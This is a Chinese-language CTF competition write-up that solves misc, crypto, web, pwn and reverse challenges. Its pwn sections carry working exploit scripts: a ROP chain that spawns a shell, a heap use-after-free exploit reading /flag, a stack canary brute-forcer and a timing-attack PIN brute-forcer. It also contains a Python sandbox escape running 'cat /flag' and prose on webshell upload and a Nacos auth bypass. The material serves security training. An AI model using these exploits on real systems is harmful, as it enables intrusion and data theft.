持续两天的比赛,打的很累,web没有出太多的题,比赛被pwn师傅带飞了,希望下此加油,下边是此次比赛排名。
文章目录
- MISC
- 签到卡
- 被加密的生产流量
- 国粹
- 调查问卷
- pyshell
- CRYPTO
- 基于国密SM2算法的密钥密文分发
- 可信度量
- Sign_in_passwd
- WEB
- Unzip
- Dumpit
- BackendService
- PWN
- 烧烤摊儿
- StrangeTalkBot
- Funcanary
- Login
- REVERSE
- ezbyte
- babyRE
MISC
签到卡
签到题
直接读取文件,键盘打print(open(‘/flag’).read())
得到flag
flag{f61e3662-5ca5-4f70-a224-fa3a1bef67fb}
被加密的生产流量
流量分析
过滤追踪流量0,会发现有base32编码的数据
把数据提取出来base32解密得到flag
flag{c1f_fi1g_1000}
国粹
提取a.png和k.png里面的数据,
将a.png里面第一个数据一万作为原点0,然后按照顺序往后推算,将整体数据都-1作为x轴上的数据,k.png里面的整体数据都-1作为y轴
手搓,提取的数据为
X=[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 9, 9, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 19, 19, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 30, 30, 30, 30, 30, 30, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 37, 38, 38, 38]
Y=[3, 4, 9, 29, 2, 3, 4, 5, 9, 28, 29, 2, 3, 9, 15, 16, 21, 22, 23, 24, 28, 29, 1, 2, 3, 4, 9, 14, 15, 17, 20, 21, 23, 24, 28, 29, 2, 3, 9, 14, 16, 17, 18, 20, 21, 24, 27, 28, 2, 3, 9, 14, 15, 17, 18, 20, 21, 24, 28, 2, 3, 9, 10, 11, 12, 14, 17, 18, 21, 22, 23, 24, 28, 29, 2, 3, 10, 11, 14, 15, 16, 17, 18, 19, 24, 28, 29, 20, 21, 23, 24, 29, 30, 22, 23, 21, 22, 23, 24, 1, 2, 3, 4, 8, 9, 10, 11, 15, 16, 17, 18, 23, 24, 1, 4, 5, 8, 11, 18, 22, 23, 4, 8, 11, 17, 18, 21, 22, 3, 4, 8, 11, 16, 17, 22, 23, 2, 3, 8, 11, 15, 16, 23, 24, 2, 8, 11, 15, 24, 2, 3, 4, 5, 8, 9, 10, 11, 15, 16, 17, 18, 20, 21, 22, 23, 24, 9, 10, 2, 3, 4, 5, 9, 10, 11, 16, 17, 18, 23, 24, 2, 5, 6, 8, 9, 15, 16, 18, 19, 21, 22, 23, 24, 2, 5, 6, 8, 9, 15, 18, 19, 23, 24, 2, 5, 6, 9, 10, 11, 15, 18, 19, 23, 24, 2, 5, 6, 11, 12, 15, 18, 19, 23, 24, 2, 5, 6, 8, 11, 12, 15, 18, 19, 23, 24, 2, 3, 5, 8, 9, 10, 11, 15, 16, 18, 19, 23, 24, 3, 4, 16, 17, 18, 9, 10, 11, 12, 24, 30, 3, 4, 5, 9, 10, 11, 12, 16, 17, 18, 22, 23, 24, 25, 31, 2, 3, 5, 6, 11, 15, 16, 22, 23, 25, 31, 5, 6, 10, 15, 16, 22, 23, 25, 31, 5, 10, 11, 16, 17, 18, 22, 23, 24, 25, 32, 4, 11, 12, 18, 19, 25, 31, 3, 4, 12, 15, 18, 19, 24, 25, 31, 3, 4, 5, 6, 8, 9, 10, 11, 12, 15, 16, 17, 18, 23, 24, 30, 31, 22, 23, 30]
用脚本将各组坐标数据排列好,得到一个类似于轨迹图的图片
import matplotlib.pyplot as plt
def generate_trajectory_plot(x, y, output_file):
plt.plot(x, y)
plt.scatter(x, y, color='red')
plt.xlabel('X')
plt.ylabel('Y')
plt.title('Trajectory Plot')
plt.savefig(output_file)
plt.show()
x_coordinates = [0,0,0,0,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,4,4,4,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5,5,5,5,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,7,7,7,7,7,7,7,7,7,7,7,7,7,8,8,8,8,8,8,9,9,11,11,11,11,12,12,12,12,12,12,12,12,12,12,12,12,12,12,13,13,13,13,13,13,13,13,14,14,14,14,14,14,14,15,15,15,15,15,15,15,15,16,16,16,16,16,16,16,16,17,17,17,17,17,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,19,19,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,25,25,25,25,25,25,25,25,25,25,26,26,26,26,26,26,26,26,26,26,26,27,27,27,27,27,27,27,27,27,27,27,27,27,28,28,28,28,28,30,30,30,30,30,30,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,32,32,32,32,32,32,32,32,32,32,32,33,33,33,33,33,33,33,33,33,34,34,34,34,34,34,34,34,34,34,34,35,35,35,35,35,35,35,36,36,36,36,36,36,36,36,36,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,38,38,38]
y_coordinates = [3,4,9,29,2,3,4,5,9,28,29,2,3,9,15,16,21,22,23,24,28,29,1,2,3,4,9,14,15,17,20,21,23,24,28,29,2,3,9,14,16,17,18,20,21,24,27,28,2,3,9,14,15,17,18,20,21,24,28,2,3,9,10,11,12,14,17,18,21,22,23,24,28,29,2,3,10,11,14,15,16,17,18,19,24,28,29,20,21,23,24,29,30,22,23,21,22,23,24,1,2,3,4,8,9,10,11,15,16,17,18,23,24,1,4,5,8,11,18,22,23,4,8,11,17,18,21,22,3,4,8,11,16,17,22,23,2,3,8,11,15,16,23,24,2,8,11,15,24,2,3,4,5,8,9,10,11,15,16,17,18,20,21,22,23,24,9,10,2,3,4,5,9,10,11,16,17,18,23,24,2,5,6,8,9,15,16,18,19,21,22,23,24,2,5,6,8,9,15,18,19,23,24,2,5,6,9,10,11,15,18,19,23,24,2,5,6,11,12,15,18,19,23,24,2,5,6,8,11,12,15,18,19,23,24,2,3,5,8,9,10,11,15,16,18,19,23,24,3,4,16,17,18,9,10,11,12,24,30,3,4,5,9,10,11,12,16,17,18,22,23,24,25,31,2,3,5,6,11,15,16,22,23,25,31,5,6,10,15,16,22,23,25,31,5,10,11,16,17,18,22,23,24,25,32,4,11,12,18,19,25,31,3,4,12,15,18,19,24,25,31,3,4,5,6,8,9,10,11,12,15,16,17,18,23,24,30,31,22,23,30]
output_image = 'trajectory_plot.png'
generate_trajectory_plot(x_coordinates, y_coordinates, output_image)
由此得到flag{202305012359}
调查问卷
直接写一份问卷得到flag
flag{TalentDevelopment}
pyshell
查看python内置文件可以看出语句之间需要_拼接
经过反复测试以及报错 得出执行的语句长度必须小于8位,并且字符也占位数
Python环境下列出根目录的命令为__import__(‘os’).system(‘ls /’),由此可推出,执行命令必须使用拼接的手法
>>'__imp'
'__imp'
>>_+"')"
"__imp')"
>>'__imp'
'__imp'
>>_+'ort'
'__import'
>>_+'__('
'__import__('
>>_+"'os"
"__import__('os"
>>_+"')"
"__import__('os')"
>>_+".s"
"__import__('os').s"
>>_+"ys"
"__import__('os').sys"
>>_+"te"
"__import__('os').syste"
>>_+"m("
"__import__('os').system("
>>_+"'l"
"__import__('os').system('l"
>>_+"s'"
"__import__('os').system('ls'"
>>_+")"
"__import__('os').system('ls')"
>>eval(_)
列出了根目录,并找到了flag
接着拼接__import__(‘os’).system(‘cat /flag’)命令来获得flag
>>'__imp'
'__imp'
>>_+'ort'
'__import'
>>_+'__('
'__import__('
>>_+"'os"
"__import__('os"
>>_+"')"
"__import__('os')"
>>_+".s"
"__import__('os').s"
>>_+"ys"
"__import__('os').sys"
>>_+"te"
"__import__('os').syste"
>>_+"m("
"__import__('os').system("
>>_+"'c"
"__import__('os').system('c"
>>_+'at '
"__import__('os').system('cat "
>>_+'/fl'
"__import__('os').system('cat /fl"
>>_+"ag"
"__import__('os').system('cat /flag"
>>_+"')"
"__import__('os').system('cat /flag')"
>>eval(_)
flag{d787c579-1639-4934-ad12-54349bab5581}
CRYPTO
基于国密SM2算法的密钥密文分发
题目附件就是步骤,跟着走就行
先登录身份获取id
然后传自己的公钥,来获取私钥
Search一下获取全部信息
然后利用sm2在线解密得到密文解密的内容
8E 94 6E CB 28 F3 47 58 F6 4F 2F 71 04 16 66 8F
传进去进行验证,验证成功得到flag
flag{b0ac8c99-bd3d-44a5-9f76-61fa0595f50f}
可信度量
非预期,直接全局搜索flag{数据和environ文件即可得到flag。
Sign_in_passwd
Base64换表,脚本没跑成,找了个在线网站。
WEB
Unzip
2021深育杯原题zipzip,跟着走即可。
2021深育杯线上初赛官方WriteUp - 先知社区 (aliyun.com)
生成两个压缩包,一个是软链接,一个是恶意木马。
然后先传入软链接再传入恶意木马,即可写入shell。
Dumpit
db参数存在注入,%0a闭合存在命令执行,应该是非预期了
Printenv
看环境变量得到flag
flag{3276d3e9-5061-4375-8171-f3ded5697565}
BackendService
首先发现是nacos框架,一个登录框,网上发现了任意用户注册和管理员密码修改。
(1条消息) NACOS漏洞问题及修复(CVE-2021-29441)_老板请吃饭的博客-CSDN博客
注册用户或者修改管理员用户,然后登录。
又发现了一个CVE。
https://xz.aliyun.com/t/11493#toc-4
刚开始直接打没成,之后在下边发现该配置变了,在这里发现了name和格式,需要用json格式发送。
反弹shell。
然后读取flag。
flag{ea59c9d3-96c8-494c-b3d3-71e3bd21ce74}
PWN
烧烤摊儿
运行程序
猜测程序中的puts函数
大致猜测应该就是输入买啤酒,然后输入几瓶,再从钱里面扣,输入负数,即可让钱增长,增长之后,即可买摊位
买完之后能改名,改名函数存在栈溢出,用工具生成payload
然后调试的到偏移,
Exp如下:
from pwn import *
from struct import pack
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
io=remote("112.126.80.123",26771)
\#io=process("./pwn")
\#libc=ELF("./libc32-2.27.so")
elf=ELF("./pwn")
io.sendline(str(1))
io.sendline(str(1))
io.sendline(str(-100000))
io.sendline(str(4))
io.sendline(str(5))
p = b'a'*(0x20)+b'bcdefjhi'
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall
\#gdb.attach(io)
\#pause()
io.sendline(p)
io.interactive()
flag{86bf0ad1-12e1-48eb-9b39-ac77eb74510c}
StrangeTalkBot
先看一眼保护
丢进64位ida查看
输入一个0x400字节的数据存到了bss段里面
这个函数对输入的数据进行了一些操作,函数里面的代码太杂了,没看懂
学逆向的队友告诉我这个有可能是个加密,他说像probuf协议加密
队友给我装了个环境,
sudo apt-get install protobuf-compiler
但是还需要有协议词,在程序里找找
应该就是这四个了
创建一个文件名为output_directory 文件夹 和 devicmesg.proto 文件
devicmesg.proto 文件放入以下代码
syntax = “proto3”;
package pack.base;
message devicmesg {
sint32 actionid = 1;
sint32 msgidx = 2;
sint32 msgsize = 3;
bytes msgcontent = 4;
}
编译一下
protoc --python_out=./output ./devicmesg.proto
然后就能看下面的内容了
增删查改功能齐全,找一下漏洞,发现
这里的置零不是指针置零,所以这个存在uaf漏洞
2.31的uaf漏洞,有沙盒存在
能用orw,那就用mov_rdx_rdi_配合setcontext函数进行orw读flag了
Exp:
from pwn import *
from struct import pack
from ctypes import *
def s(a):
p.send(a)
def sa(a, b):
p.sendafter(a, b)
def sl(a):
p.sendline(a)
def sla(a, b):
p.sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p.recv())
def rl(a):
return p.recvuntil(a)
def inter():
p.interactive()
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
\#p = process("./pwn2")
p = remote('47.94.206.10', 34904)elf = ELF("./pwn2")
libc = ELF('./libc-2.31.so')
import sys
sys.path.append('./output')
import devicmesg_pb2
def add(idx, data_len, data):
msg = devicmesg_pb2.devicmesg()
msg.actionid = 1
msg.msgidx = idx
msg.msgsize = data_len
msg.msgcontent = data
serialized_msg = msg.SerializeToString()
sa(b'now: \n', serialized_msg)
def edit(idx, data):
msg = devicmesg_pb2.devicmesg()
msg.actionid = 2
msg.msgidx = idx
msg.msgsize = 1
msg.msgcontent = data
serialized_msg = msg.SerializeToString()
sa(b'now: \n', serialized_msg)
def show(idx):
msg = devicmesg_pb2.devicmesg()
msg.actionid = 3
msg.msgidx = idx
msg.msgsize = 1
msg.msgcontent = b'a'
serialized_msg = msg.SerializeToString()
sa(b'now: \n', serialized_msg)
def free(idx):
msg = devicmesg_pb2.devicmesg()
msg.actionid = 4
msg.msgidx = idx
msg.msgsize = 1
msg.msgcontent = b'a'
serialized_msg = msg.SerializeToString()
sa(b'now: \n', serialized_msg)
for i in range(1, 10):
add(i, 0xf0, b'a'*0xf0)
for i in range(1, 9):
free(i)
show(8)
p.recv(0x38)
heap_base = u64(p.recv(8)) - 0x1470
rl(b'\x7f')
libc_base = get_addr() - 0x1ecbe0 #
rax = libc_base + 0x36174
rdi = libc_base + 0x23b6a
rsi = libc_base + 0x2601f
rdx = libc_base + 0x142c92
rsp = libc_base + 0x2f70a
ret = libc_base + 0x22679
syscall = libc_base + 0x2284d
mov_rdx_rdi_ = libc_base + 0x151990
setcontext = libc_base + 0x54F5D
buf = heap_base + 0x3000
flag = heap_base + 0x2088
free_hook = libc_base + libc.sym['__free_hook']
add(10, 0x20, b'a')
add(11, 0x20, b'a')
free(11)
free(10)
edit(10, p64(free_hook - 8))
add(12, 0x20, b'a')
payload = b'\x00'*8 + p64(mov_rdx_rdi_)
add(13, 0x20, payload)
add(14, 0xc0, (p64(heap_base + 0x1e20)*2 + p64(setcontext)*4).ljust(0xa0, b'\x00') + p64(heap_base + 0x640) + p64(ret))
open_ = libc_base + libc.sym['open']
read = libc_base + libc.sym['read']
write = libc_base + libc.sym['write']
puts = libc_base + libc.sym['puts']
orw = p64(rdi) + p64(flag) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(open_)
orw += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x30) + p64(read)
orw += p64(rdi) + p64(1) + p64(write)
orw += b'/flag\x00\x00\x00'
edit(2, orw)
free(14)
pr()
读取到flag即可
Funcanary
生成子进程,然后主进程阻塞,子进程进行输入函数
存在栈溢出但是保护全开
有后门函数,但是开启了地址随机化
因此思路就是一字节一字节的爆破canary,返回地址后三位相同,所以爆破一下后四位就行
网上有现成exp,稍改一下
Exp如下:(python2)
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='amd64', os='linux')
local = 0
elf = ELF('./pwn1')
if local:
p = process('./pwn1')
\#libc = elf.libc
else:
p = remote('123.56.99.60',31516)
libc = ELF('./pwn1')
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(7):
for i in range(256):
print ("the " + str(k) + ": " + chr(i))
p.send('a'*(0x70-8) + canary + chr(i))
a = p.recvuntil("welcome\n")
print (a)
if "have fun" in a:
canary += chr(i)
print ("canary: " + canary)
break
for i in range(16):
a = 0x10 * i + 0x2
pay = 'a'*0x68 + canary + "a"*8 + "\x31" + chr(a)
print(pay)
\#debug()
p.send(pay)
out = p.recvuntil("welcome\n")
print(out)
if b"{" in out:
success(out)
print(out)
break
p.interactive()
Login
这个题目有点脑洞,没有附件的pwn题,不过我向来爱猜,也是拿到了这个题目的一血
连上靶机之后
分别输入123看一下功能,第一时间想的是爆破密码,但是又不知道多少位,所以就想着出题人不可能这样出,看到3的8位pin code,就上网搜了一下,发现pin code 一般都是数字组成,这个就相当于一种令牌,但是穷举有将近1个亿的数据,所以换个思路,在网上漫游的时候,发现了一个测信道攻击,并且之前做到过,问了chatgpt
这个问题涉及到一个基于时间的信道攻击,常见于密码学中的侧信道攻击。
在爆破一个PIN值时,可以通过观察时间戳的差异来判断每一位是否正确。这种攻击基于以下原理:
时间差异:当输入的PIN值的某一位与正确PIN值的对应位不同时,可能会导致系统的某些操作或计算需要更多的时间。例如,当输入的PIN值的某一位与正确PIN值的对应位不匹配时,系统可能需要执行更多的比较操作或者条件判断,导致所需的时间更长。
侧信道分析:通过观察时间戳的差异,攻击者可以推断出某一位是否正确。如果时间戳的差异明显大于其他位,那么很可能是因为该位的值不正确,导致了额外的计算时间。攻击者可以利用这种侧信道信息,逐位爆破出正确的PIN值。
需要注意的是,这种攻击方法依赖于时间差异的可观察性。在一些情况下,系统可能会采取措施来减少时间差异,以防止此类侧信道攻击。因此,在实际应用中,为了提高安全性,可以采取一些对策,如增加随机延迟、固定执行时间等,来混淆时间差异,使得侧信道攻击更加困难。
所以准备采用时间戳来一位一位的爆破
Exp
from pwn import *
from sys import argv
context(os='linux',arch='amd64',log_level='debug')
def s(a):
p.send(a)
def sa(a, b):
p.sendafter(a, b)
def sl(a):
p.sendline(a)
def sla(a, b):
p.sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p.recv())
def ru(a):
return p.recvuntil(a)
def inter():
p.interactive()
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
pin='8'
a='0'
p= remote("47.94.206.10",33355)
pin_o = pin+a+'0'*(7-len(pin))
sum=0
for _ in range(10): #发十次增大数据之间相比较的时间戳值
ru('>')
sl(b'3')
ru(b"PIN code: ")
start=time.time()
sl(pin_o)
rev=ru(b'\n')
if b"Wrong PIN code" in rev:
pass
else:
print(pin_0)
break
end=time.time()
sum+=(end-start)
print(pin_o,sum)
p.interactive()
图片太多了,就不一一粘贴了
可以看到每一位的时间戳都有差距,但是50000000时,时间戳明显增大
所以猜测,这个第一位应该就是5,以此类推逐渐爆破出每一位
最后爆出来是pin code为 54730891
REVERSE
ezbyte
找到程序主函数
这个read和puts函数是通过分析程序,以及运行程序大致猜到的。
输入字符,然后经过一系列函数,开始分析函数
这个函数有两个参数,跟进分析一下
经过调试,发现v2的值为a2的长度,所以猜测这个函数是strlen函数
Puts函数是自己定义的,因为调试的时候,发现运行完这个函数,程序就打印了自己输入的东西(里面有的东西没看懂在干什么)
抱着最后希望,看404c21函数,跟进一下
发现这个函数会检测输入的flag,是否为这个格式并且提供了一点flag的信息
然后程序就会进入到404bf4这个函数,跟进一下
再看一下404bf6
跳转到这,猜测应该是跳转到404bf9处了()
此处反编译不了,在根据题目名猜测和字节码有关
经过查询之后,发现了readelf -w ezbyte会生成字节码的形式,
但是也发现不了什么信息,
在网上寻找信息的时候,找到了一篇文章(找不到哪一个了)
用
readelf --debug-dump=frames ezbyte >a.txt指令生成一个了一个字节码的文件
但是没看懂是啥意思
然后我用英文版的ida反编译的时候,发现,同样这个检测flag的函数,居然反编译的和中文版的不一样,这个是说对flag字符串进行了赋值
并且赋值的变量存储在
调试的发现是存在r12,r13,r14,r15寄存器里了
再联想到生成的字节码里
还有跳转的那个函数
脑洞一下
字节码里有数据,应该就是寄存器里的数据,应该就是flag的一部分(英文版的里ida也有灵感提示),看一下字节码的算法
写出exp
#include <stdio.h>
#include <stdint.h>
#include <string.h>
// Function to reverse a byte array in-place
void reverseBytes(uint8_t* bytes, size_t length) {
for (size_t i = 0; i < length / 2; i++) {
uint8_t temp = bytes[i];
bytes[i] = bytes[length - i - 1];
bytes[length - i - 1] = temp;
}
}
int main() {
uint64_t r12 = (2616514329260088143ULL ^ 1237891274917891239ULL) - 1892739;
uint64_t r13 = (8502251781212277489ULL ^ 1209847170981118947ULL) - 8971237;
uint64_t r14 = (2451795628338718684ULL ^ 1098791727398412397ULL) - 1512312;
uint64_t r15 = (8722213363631027234ULL ^ 1890878197237214971ULL) - 9123704;
// Reverse the bytes
reverseBytes((uint8_t*)&r12, sizeof(r12));
reverseBytes((uint8_t*)&r13, sizeof(r13));
reverseBytes((uint8_t*)&r14, sizeof(r14));
reverseBytes((uint8_t*)&r15, sizeof(r15));
uint8_t flag[37];
// Copy the bytes to the flag array
memcpy(flag, "flag{", 5);
memcpy(flag + 5, &r12, sizeof(r12));
memcpy(flag + 5 + sizeof(r12), &r13, sizeof(r13));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13), &r14, sizeof(r14));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13) + sizeof(r14), &r15, sizeof(r15));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13) + sizeof(r14) + sizeof(r15), "3861}", 6);
printf("%s\n", flag);
return 0;
}
//flag{5bfe906ee4-e07e--96ca-49c69d13ca3861}
但是这个flag不对
跑出来的让我肯定这个算法不会出错,想到elf文件会不会是小端序存储,然后就又改了一下
Exp
#include <stdio.h>
#include <stdint.h>
#include <string.h>
// Function to reverse a byte array in-place
void reverseBytes(uint8_t* bytes, size_t length) {
for (size_t i = 0; i < length / 2; i++) {
uint8_t temp = bytes[i];
bytes[i] = bytes[length - i - 1];
bytes[length - i - 1] = temp;
}
}
int main() {
uint64_t r12 = (2616514329260088143ULL ^ 1237891274917891239ULL) - 1892739;
uint64_t r13 = (8502251781212277489ULL ^ 1209847170981118947ULL) - 8971237;
uint64_t r14 = (2451795628338718684ULL ^ 1098791727398412397ULL) - 1512312;
uint64_t r15 = (8722213363631027234ULL ^ 1890878197237214971ULL) - 9123704;
// Reverse the bytes
reverseBytes((uint8_t*)&r12, sizeof(r12));
reverseBytes((uint8_t*)&r13, sizeof(r13));
reverseBytes((uint8_t*)&r14, sizeof(r14));
reverseBytes((uint8_t*)&r15, sizeof(r15));
uint8_t flag[37];
// Copy the bytes to the flag array
memcpy(flag, "flag{", 5);
memcpy(flag + 5, &r12, sizeof(r12));
memcpy(flag + 5 + sizeof(r12), &r13, sizeof(r13));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13), &r14, sizeof(r14));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13) + sizeof(r14), &r15, sizeof(r15));
memcpy(flag + 5 + sizeof(r12) + sizeof(r13) + sizeof(r14) + sizeof(r15), "3861}", 6);
// Reverse each part inside the parentheses
reverseBytes(flag + 5, sizeof(r12));
reverseBytes(flag + 5 + sizeof(r12), sizeof(r13));
reverseBytes(flag + 5 + sizeof(r12) + sizeof(r13), sizeof(r14));
reverseBytes(flag + 5 + sizeof(r12) + sizeof(r13) + sizeof(r14), sizeof(r15));
printf("%s\n", flag);
return 0;
}
// flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}
这个flag是对的
果然三分逆向七分猜
flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}
babyRE
打开那个网页
进入这个网站
找到锁图案里边的主要函数
这个函数把输入的字符串中的每个值与上一个异或然后和secret这个列表进行对比
添加显示变量按钮来获得secret的值然后编写脚本
Exp
#include <stdio.h>
#include <stdint.h>
int main() {
uint8_t secret[] = {102, 10, 13, 6, 28, 74, 3, 1, 3, 7, 85, 0, 4, 75, 20, 92, 92, 8, 28, 25, 81, 83, 7, 28, 76, 88, 9, 0, 29, 73,
0, 86, 4, 87, 87, 82, 84, 85, 4, 85, 87, 30};
char flag[42] = "f";
for (int i = 1; i < 41; i++) {
secret[i] = secret[i] ^ secret[i - 1];
flag[i] = secret[i];
}
printf("%s}\n", flag);
return 0;
}
运行后得flag
Flag:flag{12307bbf-9e91-4e61-a900-dd26a6d0ea4c}